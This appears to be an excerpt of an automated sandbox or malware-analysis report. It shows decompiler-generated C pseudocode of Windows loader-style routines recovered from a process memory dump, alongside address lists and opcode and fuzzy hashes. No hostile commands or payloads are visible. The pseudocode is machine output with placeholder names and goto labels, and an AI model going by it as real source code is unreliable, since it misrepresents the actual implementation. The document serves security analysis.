                        											} while ((_t133 & 0x00000004) == 0);
                        											goto L93;
                        										} else {
                        											_t218 =  *0x2be6904; // 0x400
                        											__eflags = _t218;
                        											if(__eflags == 0) {
                        												goto L89;
                        											} else {
                        												goto L87;
                        											}
                        											while(1) {
                        												L87:
                        												__eflags = _v16 & 0x00000002;
                        												if(__eflags == 0) {
                        													goto L89;
                        												}
                        												asm("pause");
                        												_t218 = _t218 - 1;
                        												__eflags = _t218;
                        												if(__eflags != 0) {
                        													continue;
                        												}
                        												goto L89;
                        											}
                        											goto L89;
                        										}
                        									}
                        								}
                        							}
                        							L10:
                        							_t229 =  *0x2be6e48; // 0x0
                        							_v72 = _t229;
                        							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                        								E02B0FFB0(_t198, _t240, 0x2be8608);
                        								_t253 = _v76;
                        								goto L29;
                        							} else {
                        								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
                        								asm("lock cmpxchg [esi], ecx");
                        								_t215 = 1;
                        								if(1 != 1) {
                        									while(1) {
                        										_t246 = _t215 & 0x00000006;
                        										_t180 = _t215;
                        										__eflags = _t246 - 2;
                        										_v56 = _t246;
                        										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
                        										asm("lock cmpxchg [edi], esi");
                        										_t248 = _v56;
                        										__eflags = _t180 - _t215;
                        										if(_t180 == _t215) {
                        											break;
                        										}
                        										_t215 = _t180;
                        									}
                        									__eflags = _t248 - 2;
                        									if(_t248 == 2) {
                        										__eflags = 0;
                        										E02B300C2(0x2be8608, 0, _t235);
                        									}
                        									_t229 = _v72;
                        								}
                        								goto L14;
                        							}
                        						}
                        					}
                        				}
                        				_t227 = 0;
                        				_v75 = 0;
                        				if(_t128 != 0) {
                        					goto L4;
                        				}
                        				goto L2;
                        			}

                        0x02b22320
                        0x02b22325
                        0x02b2232a
                        0x02b2232c
                        0x02b2233e
                        0x02b2233e
                        0x00000000
                        0x02b2232c
                        0x02b22311
                        0x02b22317
                        0x02b2231a
                        0x02b2231c
                        0x02b22380
                        0x02b22380
                        0x02b22380
                        0x02b22384
                        0x00000000
                        0x00000000
                        0x02b22386
                        0x00000000
                        0x02b2231c
                        0x02b2225c
                        0x02b2225c
                        0x00000000
                        0x02b2225c
                        0x02b2212a
                        0x02b22134
                        0x02b22138
                        0x02b2213d
                        0x02b65858
                        0x02b65863
                        0x02b65863
                        0x02b65867
                        0x02b6586a
                        0x00000000
                        0x00000000
                        0x02b6586c
                        0x02b6586c
                        0x02b65871
                        0x02b65875
                        0x02b65877
                        0x02b65997
                        0x02b6599c
                        0x02b659a1
                        0x02b659a7
                        0x02b659a7
                        0x00000000
                        0x02b659a7
                        0x02b6587d
                        0x00000000
                        0x02b6588b
                        0x02b6588b
                        0x02b65890
                        0x02b65892
                        0x02b65894
                        0x02b65899
                        0x02b6589b
                        0x02b658a0
                        0x02b658a0
                        0x02b658aa
                        0x02b658b2
                        0x02b658b6
                        0x02b658be
                        0x02b658c6
                        0x02b658c9
                        0x02b6590d
                        0x02b65917
                        0x02b6591a
                        0x02b6591c
                        0x02b65920
                        0x02b65928
                        0x02b6592a
                        0x02b6592c
                        0x02b6592e
                        0x02b6592e
                        0x02b658cb
                        0x02b658cd
                        0x02b658d8
                        0x02b658e0
                        0x02b658f4
                        0x02b658fe
                        0x02b658fe
                        0x02b6593a
                        0x02b6593e
                        0x02b65940
                        0x02b65942
                        0x00000000
                        0x02b65944
                        0x02b65944
                        0x02b65949
                        0x02b6594e
                        0x02b6594e
                        0x02b65953
                        0x02b6595b
                        0x02b65976
                        0x02b65976
                        0x02b6597a
                        0x02b6597f
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02b65981
                        0x02b65981
                        0x02b65981
                        0x02b65983
                        0x02b65988
                        0x02b6598d
                        0x02b65991
                        0x02b65991
                        0x00000000
                        0x02b6595d
                        0x02b6595d
                        0x02b65963
                        0x02b65965
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02b65967
                        0x02b65967
                        0x02b6596b
                        0x02b6596d
                        0x00000000
                        0x00000000
                        0x02b6596f
                        0x02b65971
                        0x02b65971
                        0x02b65974
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02b65974
                        0x00000000
                        0x02b65967
                        0x02b6595b
                        0x02b65942
                        0x02b65863
                        0x02b22143
                        0x02b22143
                        0x02b22149
                        0x02b2214f
                        0x02b222f1
                        0x02b222f6
                        0x00000000
                        0x02b22173
                        0x02b22173
                        0x02b2217d
                        0x02b22181
                        0x02b22186
                        0x02b659ae
                        0x02b659b2
                        0x02b659b5
                        0x02b659b7
                        0x02b659ba
                        0x02b659cd
                        0x02b659d1
                        0x02b659d5
                        0x02b659d9
                        0x02b659db
                        0x00000000
                        0x00000000
                        0x02b659dd
                        0x02b659dd
                        0x02b659e1
                        0x02b659e4
                        0x02b659e7
                        0x02b659ee
                        0x02b659ee
                        0x02b659f3
                        0x02b659f3
                        0x00000000
                        0x02b22186
                        0x02b2214f
                        0x02b22106
                        0x02b22266
                        0x02b220d8
                        0x02b220da
                        0x02b220e0
                        0x00000000
                        0x00000000
                        0x00000000

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0e1f1cfddb24320c85313179a87c4524e19708765c2b89f6f87f0835723192ee
                        • Instruction ID: d6abd85c55c6b23666e9446699182f1427024b7cda23896a89263bf144036a46
                        • Opcode Fuzzy Hash: 0e1f1cfddb24320c85313179a87c4524e19708765c2b89f6f87f0835723192ee
                        • Instruction Fuzzy Hash: FBF10471A083619FDB35CF28C444B6A77E2EF85314F04899DED99DB290D739D849CB82
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 87%
                        			E02B0D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
                        				signed int _v8;
                        				intOrPtr _v20;
                        				signed int _v36;
                        				intOrPtr* _v40;
                        				signed int _v44;
                        				signed int _v48;
                        				signed char _v52;
                        				signed int _v60;
                        				signed int _v64;
                        				signed int _v68;
                        				signed int _v72;
                        				signed int _v76;
                        				intOrPtr _v80;
                        				signed int _v84;
                        				intOrPtr _v100;
                        				intOrPtr _v104;
                        				signed int _v108;
                        				signed int _v112;
                        				signed int _v116;
                        				intOrPtr _v120;
                        				signed int _v132;
                        				char _v140;
                        				char _v144;
                        				char _v157;
                        				signed int _v164;
                        				signed int _v168;
                        				signed int _v169;
                        				intOrPtr _v176;
                        				signed int _v180;
                        				signed int _v184;
                        				intOrPtr _v188;
                        				signed int _v192;
                        				signed int _v200;
                        				signed int _v208;
                        				intOrPtr* _v212;
                        				char _v216;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				signed int _t204;
                        				signed int _t206;
                        				void* _t208;
                        				signed int _t211;
                        				signed int _t216;
                        				intOrPtr _t217;
                        				intOrPtr* _t218;
                        				signed int _t226;
                        				signed int _t239;
                        				signed int* _t247;
                        				signed int _t249;
                        				void* _t252;
                        				signed int _t256;
                        				signed int _t269;
                        				signed int _t271;
                        				signed int _t277;
                        				signed int _t279;
                        				intOrPtr _t283;
                        				signed int _t287;
                        				signed int _t288;
                        				void* _t289;
                        				signed char _t290;
                        				signed int _t292;
                        				signed int* _t293;
                        				unsigned int _t297;
                        				signed int _t306;
                        				signed int _t307;
                        				signed int _t308;
                        				signed int _t309;
                        				signed int _t310;
                        				intOrPtr _t311;
                        				intOrPtr _t312;
                        				signed int _t319;
                        				signed int _t320;
                        				signed int* _t324;
                        				signed int _t337;
                        				signed int _t338;
                        				signed int _t339;
                        				signed int* _t340;
                        				void* _t341;
                        				signed int _t344;
                        				signed int _t348;
                        				signed int _t349;
                        				signed int _t351;
                        				intOrPtr _t353;
                        				void* _t354;
                        				signed int _t356;
                        				signed int _t358;
                        				intOrPtr _t359;
                        				signed int _t361;
                        				signed int _t363;
                        				signed short* _t365;
                        				void* _t367;
                        				intOrPtr _t369;
                        				void* _t370;
                        				signed int _t371;
                        				signed int _t372;
                        				void* _t374;
                        				signed int _t376;
                        				void* _t384;
                        				signed int _t387;
                        
                        				_v8 =  *0x2bed360 ^ _t376;
                        				_t2 =  &_a20;
                        				 *_t2 = _a20 & 0x00000001;
                        				_t287 = _a4;
                        				_v200 = _a12;
                        				_t365 = _a8;
                        				_v212 = _a16;
                        				_v180 = _a24;
                        				_v168 = 0;
                        				_v157 = 0;
                        				if( *_t2 != 0) {
                        					__eflags = E02B06600(0x2be52d8);
                        					if(__eflags == 0) {
                        						goto L1;
                        					} else {
                        						_v188 = 6;
                        					}
                        				} else {
                        					L1:
                        					_v188 = 9;
                        				}
                        				if(_t365 == 0) {
                        					_v164 = 0;
                        					goto L5;
                        				} else {
                        					_t363 =  *_t365 & 0x0000ffff;
                        					_t341 = _t363 + 1;
                        					if((_t365[1] & 0x0000ffff) < _t341) {
                        						L109:
                        						__eflags = _t341 - 0x80;
                        						if(_t341 <= 0x80) {
                        							_t281 =  &_v140;
                        							_v164 =  &_v140;
                        							goto L114;
                        						} else {
                        							_t283 =  *0x2be7b9c; // 0x0
                        							_t281 = L02B14620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
                        							_v164 = _t281;
                        							__eflags = _t281;
                        							if(_t281 != 0) {
                        								_v157 = 1;
                        								L114:
                        								E02B3F3E0(_t281, _t365[2], _t363);
                        								_t200 = _v164;
                        								 *((char*)(_v164 + _t363)) = 0;
                        								goto L5;
                        							} else {
                        								_t204 = 0xc000009a;
                        								goto L47;
                        							}
                        						}
                        					} else {
                        						_t200 = _t365[2];
                        						_v164 = _t200;
                        						if( *((char*)(_t200 + _t363)) != 0) {
                        							goto L109;
                        						} else {
                        							while(1) {
                        								L5:
                        								_t353 = 0;
                        								_t342 = 0x1000;
                        								_v176 = 0;
                        								if(_t287 == 0) {
                        									break;
                        								}
                        								_t384 = _t287 -  *0x2be7b90; // 0x77df0000
                        								if(_t384 == 0) {
                        									_t353 =  *0x2be7b8c; // 0x603d80
                        									_v176 = _t353;
                        									_t320 = ( *(_t353 + 0x50))[8];
                        									_v184 = _t320;
                        								} else {
                        									E02B12280(_t200, 0x2be84d8);
                        									_t277 =  *0x2be85f4; // 0x601f40
                        									_t351 =  *0x2be85f8 & 1;
                        									while(_t277 != 0) {
                        										_t337 =  *(_t277 - 0x50);
                        										if(_t337 > _t287) {
                        											_t338 = _t337 | 0xffffffff;
                        										} else {
                        											asm("sbb ecx, ecx");
                        											_t338 =  ~_t337;
                        										}
                        										_t387 = _t338;
                        										if(_t387 < 0) {
                        											_t339 =  *_t277;
                        											__eflags = _t351;
                        											if(_t351 != 0) {
                        												__eflags = _t339;
                        												if(_t339 == 0) {
                        													goto L16;
                        												} else {
                        													goto L118;
                        												}
                        												goto L151;
                        											} else {
                        												goto L16;
                        											}
                        											goto L17;
                        										} else {
                        											if(_t387 <= 0) {
                        												__eflags = _t277;
                        												if(_t277 != 0) {
                        													_t340 =  *(_t277 - 0x18);
                        													_t24 = _t277 - 0x68; // 0x601ed8
                        													_t353 = _t24;
                        													_v176 = _t353;
                        													__eflags = _t340[3] - 0xffffffff;
                        													if(_t340[3] != 0xffffffff) {
                        														_t279 =  *_t340;
                        														__eflags =  *(_t279 - 0x20) & 0x00000020;
                        														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
                        															asm("lock inc dword [edi+0x9c]");
                        															_t340 =  *(_t353 + 0x50);
                        														}
                        													}
                        													_v184 = _t340[8];
                        												}
                        											} else {
                        												_t339 =  *(_t277 + 4);
                        												if(_t351 != 0) {
                        													__eflags = _t339;
                        													if(_t339 == 0) {
                        														goto L16;
                        													} else {
                        														L118:
                        														_t277 = _t277 ^ _t339;
                        														goto L17;
                        													}
                        													goto L151;
                        												} else {
                        													L16:
                        													_t277 = _t339;
                        												}
                        												goto L17;
                        											}
                        										}
                        										goto L25;
                        										L17:
                        									}
                        									L25:
                        									E02B0FFB0(_t287, _t353, 0x2be84d8);
                        									_t320 = _v184;
                        									_t342 = 0x1000;
                        								}
                        								if(_t353 == 0) {
                        									break;
                        								} else {
                        									_t366 = 0;
                        									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
                        										_t288 = _v164;
                        										if(_t353 != 0) {
                        											_t342 = _t288;
                        											_t374 = E02B4CC99(_t353, _t288, _v200, 1,  &_v168);
                        											if(_t374 >= 0) {
                        												if(_v184 == 7) {
                        													__eflags = _a20;
                        													if(__eflags == 0) {
                        														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
                        														if(__eflags != 0) {
                        															_t271 = E02B06600(0x2be52d8);
                        															__eflags = _t271;
                        															if(__eflags == 0) {
                        																_t342 = 0;
                        																_v169 = _t271;
                        																_t374 = E02B07926( *(_t353 + 0x50), 0,  &_v169);
                        															}
                        														}
                        													}
                        												}
                        												if(_t374 < 0) {
                        													_v168 = 0;
                        												} else {
                        													if( *0x2beb239 != 0) {
                        														_t342 =  *(_t353 + 0x18);
                        														E02B7E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
                        													}
                        													if( *0x2be8472 != 0) {
                        														_v192 = 0;
                        														_t342 =  *0x7ffe0330;
                        														_t361 =  *0x2beb218; // 0x0
                        														asm("ror edi, cl");
                        														 *0x2beb1e0( &_v192, _t353, _v168, 0, _v180);
                        														 *(_t361 ^  *0x7ffe0330)();
                        														_t269 = _v192;
                        														_t353 = _v176;
                        														__eflags = _t269;
                        														if(__eflags != 0) {
                        															_v168 = _t269;
                        														}
                        													}
                        												}
                        											}
                        											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
                        												_t366 = 0xc000007a;
                        											}
                        											_t247 =  *(_t353 + 0x50);
                        											if(_t247[3] == 0xffffffff) {
                        												L40:
                        												if(_t366 == 0xc000007a) {
                        													__eflags = _t288;
                        													if(_t288 == 0) {
                        														goto L136;
                        													} else {
                        														_t366 = 0xc0000139;
                        													}
                        													goto L54;
                        												}
                        											} else {
                        												_t249 =  *_t247;
                        												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
                        													goto L40;
                        												} else {
                        													_t250 = _t249 | 0xffffffff;
                        													asm("lock xadd [edi+0x9c], eax");
                        													if((_t249 | 0xffffffff) == 0) {
                        														E02B12280(_t250, 0x2be84d8);
                        														_t342 =  *(_t353 + 0x54);
                        														_t165 = _t353 + 0x54; // 0x54
                        														_t252 = _t165;
                        														__eflags =  *(_t342 + 4) - _t252;
                        														if( *(_t342 + 4) != _t252) {
                        															L135:
                        															asm("int 0x29");
                        															L136:
                        															_t288 = _v200;
                        															_t366 = 0xc0000138;
                        															L54:
                        															_t342 = _t288;
                        															L02B33898(0, _t288, _t366);
                        														} else {
                        															_t324 =  *(_t252 + 4);
                        															__eflags =  *_t324 - _t252;
                        															if( *_t324 != _t252) {
                        																goto L135;
                        															} else {
                        																 *_t324 = _t342;
                        																 *(_t342 + 4) = _t324;
                        																_t293 =  *(_t353 + 0x50);
                        																_v180 =  *_t293;
                        																E02B0FFB0(_t293, _t353, 0x2be84d8);
                        																__eflags =  *((short*)(_t353 + 0x3a));
                        																if( *((short*)(_t353 + 0x3a)) != 0) {
                        																	_t342 = 0;
                        																	__eflags = 0;
                        																	E02B337F5(_t353, 0);
                        																}
                        																E02B30413(_t353);
                        																_t256 =  *(_t353 + 0x48);
                        																__eflags = _t256;
                        																if(_t256 != 0) {
                        																	__eflags = _t256 - 0xffffffff;
                        																	if(_t256 != 0xffffffff) {
                        																		E02B29B10(_t256);
                        																	}
                        																}
                        																__eflags =  *(_t353 + 0x28);
                        																if( *(_t353 + 0x28) != 0) {
                        																	_t174 = _t353 + 0x24; // 0x24
                        																	E02B202D6(_t174);
                        																}
                        																L02B177F0( *0x2be7b98, 0, _t353);
                        																__eflags = _v180 - _t293;
                        																if(__eflags == 0) {
                        																	E02B2C277(_t293, _t366);
                        																}
                        																_t288 = _v164;
                        																goto L40;
                        															}
                        														}
                        													} else {
                        														goto L40;
                        													}
                        												}
                        											}
                        										}
                        									} else {
                        										L02B0EC7F(_t353);
                        										L02B219B8(_t287, 0, _t353, 0);
                        										_t200 = E02AFF4E3(__eflags);
                        										continue;
                        									}
                        								}
                        								L41:
                        								if(_v157 != 0) {
                        									L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
                        								}
                        								if(_t366 < 0) {
                        									L46:
                        									 *_v212 = _v168;
                        									_t204 = _t366;
                        									L47:
                        									_pop(_t354);
                        									_pop(_t367);
                        									_pop(_t289);
                        									return E02B3B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
                        								} else {
                        									_t206 =  *0x2beb2f8; // 0xad0000
                        									if((_t206 |  *0x2beb2fc) == 0 || ( *0x2beb2e4 & 0x00000001) != 0) {
                        										goto L46;
                        									} else {
                        										_t297 =  *0x2beb2ec; // 0x100
                        										_v200 = 0;
                        										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
                        											_t355 = _v168;
                        											_t342 =  &_v208;
                        											_t208 = E02BA6B68(_v168,  &_v208, _v168, __eflags);
                        											__eflags = _t208 - 1;
                        											if(_t208 == 1) {
                        												goto L46;
                        											} else {
                        												__eflags = _v208 & 0x00000010;
                        												if((_v208 & 0x00000010) == 0) {
                        													goto L46;
                        												} else {
                        													_t342 = 4;
                        													_t366 = E02BA6AEB(_t355, 4,  &_v216);
                        													__eflags = _t366;
                        													if(_t366 >= 0) {
                        														goto L46;
                        													} else {
                        														asm("int 0x29");
                        														_t356 = 0;
                        														_v44 = 0;
                        														_t290 = _v52;
                        														__eflags = 0;
                        														if(0 == 0) {
                        															L108:
                        															_t356 = 0;
                        															_v44 = 0;
                        															goto L63;
                        														} else {
                        															__eflags = 0;
                        															if(0 < 0) {
                        																goto L108;
                        															}
                        															L63:
                        															_v112 = _t356;
                        															__eflags = _t356;
                        															if(_t356 == 0) {
                        																L143:
                        																_v8 = 0xfffffffe;
                        																_t211 = 0xc0000089;
                        															} else {
                        																_v36 = 0;
                        																_v60 = 0;
                        																_v48 = 0;
                        																_v68 = 0;
                        																_v44 = _t290 & 0xfffffffc;
                        																E02B0E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
                        																_t306 = _v68;
                        																__eflags = _t306;
                        																if(_t306 == 0) {
                        																	_t216 = 0xc000007b;
                        																	_v36 = 0xc000007b;
                        																	_t307 = _v60;
                        																} else {
                        																	__eflags = _t290 & 0x00000001;
                        																	if(__eflags == 0) {
                        																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
                        																		__eflags = _t349 - 0x10b;
                        																		if(_t349 != 0x10b) {
                        																			__eflags = _t349 - 0x20b;
                        																			if(_t349 == 0x20b) {
                        																				goto L102;
                        																			} else {
                        																				_t307 = 0;
                        																				_v48 = 0;
                        																				_t216 = 0xc000007b;
                        																				_v36 = 0xc000007b;
                        																				goto L71;
                        																			}
                        																		} else {
                        																			L102:
                        																			_t307 =  *(_t306 + 0x50);
                        																			goto L69;
                        																		}
                        																		goto L151;
                        																	} else {
                        																		_t239 = L02B0EAEA(_t290, _t290, _t356, _t366, __eflags);
                        																		_t307 = _t239;
                        																		_v60 = _t307;
                        																		_v48 = _t307;
                        																		__eflags = _t307;
                        																		if(_t307 != 0) {
                        																			L70:
                        																			_t216 = _v36;
                        																		} else {
                        																			_push(_t239);
                        																			_push(0x14);
                        																			_push( &_v144);
                        																			_push(3);
                        																			_push(_v44);
                        																			_push(0xffffffff);
                        																			_t319 = E02B39730();
                        																			_v36 = _t319;
                        																			__eflags = _t319;
                        																			if(_t319 < 0) {
                        																				_t216 = 0xc000001f;
                        																				_v36 = 0xc000001f;
                        																				_t307 = _v60;
                        																			} else {
                        																				_t307 = _v132;
                        																				L69:
                        																				_v48 = _t307;
                        																				goto L70;
                        																			}
                        																		}
                        																	}
                        																}
                        																L71:
                        																_v72 = _t307;
                        																_v84 = _t216;
                        																__eflags = _t216 - 0xc000007b;
                        																if(_t216 == 0xc000007b) {
                        																	L150:
                        																	_v8 = 0xfffffffe;
                        																	_t211 = 0xc000007b;
                        																} else {
                        																	_t344 = _t290 & 0xfffffffc;
                        																	_v76 = _t344;
                        																	__eflags = _v40 - _t344;
                        																	if(_v40 <= _t344) {
                        																		goto L150;
                        																	} else {
                        																		__eflags = _t307;
                        																		if(_t307 == 0) {
                        																			L75:
                        																			_t217 = 0;
                        																			_v104 = 0;
                        																			__eflags = _t366;
                        																			if(_t366 != 0) {
                        																				__eflags = _t290 & 0x00000001;
                        																				if((_t290 & 0x00000001) != 0) {
                        																					_t217 = 1;
                        																					_v104 = 1;
                        																				}
                        																				_t290 = _v44;
                        																				_v52 = _t290;
                        																			}
                        																			__eflags = _t217 - 1;
                        																			if(_t217 != 1) {
                        																				_t369 = 0;
                        																				_t218 = _v40;
                        																				goto L91;
                        																			} else {
                        																				_v64 = 0;
                        																				E02B0E9C0(1, _t290, 0, 0,  &_v64);
                        																				_t309 = _v64;
                        																				_v108 = _t309;
                        																				__eflags = _t309;
                        																				if(_t309 == 0) {
                        																					goto L143;
                        																				} else {
                        																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
                        																					__eflags = _t226 - 0x10b;
                        																					if(_t226 != 0x10b) {
                        																						__eflags = _t226 - 0x20b;
                        																						if(_t226 != 0x20b) {
                        																							goto L143;
                        																						} else {
                        																							_t371 =  *(_t309 + 0x98);
                        																							goto L83;
                        																						}
                        																					} else {
                        																						_t371 =  *(_t309 + 0x88);
                        																						L83:
                        																						__eflags = _t371;
                        																						if(_t371 != 0) {
                        																							_v80 = _t371 - _t356 + _t290;
                        																							_t310 = _v64;
                        																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
                        																							_t292 =  *(_t310 + 6) & 0x0000ffff;
                        																							_t311 = 0;
                        																							__eflags = 0;
                        																							while(1) {
                        																								_v120 = _t311;
                        																								_v116 = _t348;
                        																								__eflags = _t311 - _t292;
                        																								if(_t311 >= _t292) {
                        																									goto L143;
                        																								}
                        																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
                        																								__eflags = _t371 - _t359;
                        																								if(_t371 < _t359) {
                        																									L98:
                        																									_t348 = _t348 + 0x28;
                        																									_t311 = _t311 + 1;
                        																									continue;
                        																								} else {
                        																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
                        																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
                        																										goto L98;
                        																									} else {
                        																										__eflags = _t348;
                        																										if(_t348 == 0) {
                        																											goto L143;
                        																										} else {
                        																											_t218 = _v40;
                        																											_t312 =  *_t218;
                        																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
                        																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
                        																												_v100 = _t359;
                        																												_t360 = _v108;
                        																												_t372 = L02B08F44(_v108, _t312);
                        																												__eflags = _t372;
                        																												if(_t372 == 0) {
                        																													goto L143;
                        																												} else {
                        																													_t290 = _v52;
                        																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E02B33C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
                        																													_t307 = _v72;
                        																													_t344 = _v76;
                        																													_t218 = _v40;
                        																													goto L91;
                        																												}
                        																											} else {
                        																												_t290 = _v52;
                        																												_t307 = _v72;
                        																												_t344 = _v76;
                        																												_t369 = _v80;
                        																												L91:
                        																												_t358 = _a4;
                        																												__eflags = _t358;
                        																												if(_t358 == 0) {
                        																													L95:
                        																													_t308 = _a8;
                        																													__eflags = _t308;
                        																													if(_t308 != 0) {
                        																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
                        																													}
                        																													_v8 = 0xfffffffe;
                        																													_t211 = _v84;
                        																												} else {
                        																													_t370 =  *_t218 - _t369 + _t290;
                        																													 *_t358 = _t370;
                        																													__eflags = _t370 - _t344;
                        																													if(_t370 <= _t344) {
                        																														L149:
                        																														 *_t358 = 0;
                        																														goto L150;
                        																													} else {
                        																														__eflags = _t307;
                        																														if(_t307 == 0) {
                        																															goto L95;
                        																														} else {
                        																															__eflags = _t370 - _t344 + _t307;
                        																															if(_t370 >= _t344 + _t307) {
                        																																goto L149;
                        																															} else {
                        																																goto L95;
                        																															}
                        																														}
                        																													}
                        																												}
                        																											}
                        																										}
                        																									}
                        																								}
                        																								goto L97;
                        																							}
                        																						}
                        																						goto L143;
                        																					}
                        																				}
                        																			}
                        																		} else {
                        																			__eflags = _v40 - _t307 + _t344;
                        																			if(_v40 >= _t307 + _t344) {
                        																				goto L150;
                        																			} else {
                        																				goto L75;
                        																			}
                        																		}
                        																	}
                        																}
                        															}
                        															L97:
                        															 *[fs:0x0] = _v20;
                        															return _t211;
                        														}
                        													}
                        												}
                        											}
                        										} else {
                        											goto L46;
                        										}
                        									}
                        								}
                        								goto L151;
                        							}
                        							_t288 = _v164;
                        							_t366 = 0xc0000135;
                        							goto L41;
                        						}
                        					}
                        				}
                        				L151:
                        			}

                        0x02b0dc91
                        0x02b0dc93
                        0x02b0dcce
                        0x02b0dcce
                        0x02b0dc95
                        0x02b0dc9c
                        0x02b0dc6e
                        0x02b0dc72
                        0x02b0dc75
                        0x02b0dc77
                        0x02b0dc79
                        0x02b5b551
                        0x02b5b551
                        0x00000000
                        0x02b0dc7f
                        0x02b0dc7f
                        0x02b0dc81
                        0x00000000
                        0x02b0dc83
                        0x02b0dc86
                        0x02b0dc88
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02b0dc88
                        0x02b0dc81
                        0x02b0dc79
                        0x02b0dc6c
                        0x02b0dc55
                        0x02b0dc47
                        0x02b0dc43
                        0x00000000
                        0x02b0dc36
                        0x02b0dc23
                        0x00000000
                        0x02b0dbff
                        0x02b0dbf1
                        0x02b0dbdf
                        0x02b0db8f
                        0x02b0db92
                        0x02b0db95
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02b0db95
                        0x02b0db8d
                        0x02b0db85
                        0x02b0db74
                        0x02b0dc9f
                        0x02b0dca2
                        0x02b0dcb0
                        0x02b0dcb0
                        0x02b0dad1
                        0x02b5b4e5
                        0x02b5b4c8
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02b0d831
                        0x02b0d80d
                        0x00000000
                        0x02b0d800
                        0x02b5b47f
                        0x02b5b485
                        0x00000000
                        0x02b5b485
                        0x02b0d665
                        0x02b0d652
                        0x00000000

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 01c159efdb1035ccdcdec92c64b9010134387814464cfff10870454a4f8e43c1
                        • Instruction ID: 4cabc2b950b4170c0dcaa3e22e281678a8580e54288c7d2049eadb5f7a29457c
                        • Opcode Fuzzy Hash: 01c159efdb1035ccdcdec92c64b9010134387814464cfff10870454a4f8e43c1
                        • Instruction Fuzzy Hash: 80E1A070A00766CFEB26CFA4C880B69BBB2FF45308F0441D9D949AB2D0DB74A981CF51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 92%
                        			E02B0849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
                        				void* _t136;
                        				signed int _t139;
                        				signed int _t141;
                        				signed int _t145;
                        				intOrPtr _t146;
                        				signed int _t149;
                        				signed int _t150;
                        				signed int _t161;
                        				signed int _t163;
                        				signed int _t165;
                        				signed int _t169;
                        				signed int _t171;
                        				signed int _t194;
                        				signed int _t200;
                        				void* _t201;
                        				signed int _t204;
                        				signed int _t206;
                        				signed int _t210;
                        				signed int _t214;
                        				signed int _t215;
                        				signed int _t218;
                        				void* _t221;
                        				signed int _t224;
                        				signed int _t226;
                        				intOrPtr _t228;
                        				signed int _t232;
                        				signed int _t233;
                        				signed int _t234;
                        				void* _t237;
                        				void* _t238;
                        
                        				_t236 = __esi;
                        				_t235 = __edi;
                        				_t193 = __ebx;
                        				_push(0x70);
                        				_push(0x2bcf9c0);
                        				E02B4D0E8(__ebx, __edi, __esi);
                        				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
                        				if( *0x2be7b04 == 0) {
                        					L4:
                        					goto L5;
                        				} else {
                        					_t136 = E02B0CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
                        					_t236 = 0;
                        					if(_t136 < 0) {
                        						 *((intOrPtr*)(_t237 - 0x54)) = 0;
                        					}
                        					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
                        						_t193 =  *( *[fs:0x30] + 0x18);
                        						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
                        						 *(_t237 - 0x68) = _t236;
                        						 *(_t237 - 0x6c) = _t236;
                        						_t235 = _t236;
                        						 *(_t237 - 0x60) = _t236;
                        						E02B12280( *[fs:0x30], 0x2be8550);
                        						_t139 =  *0x2be7b04; // 0x1
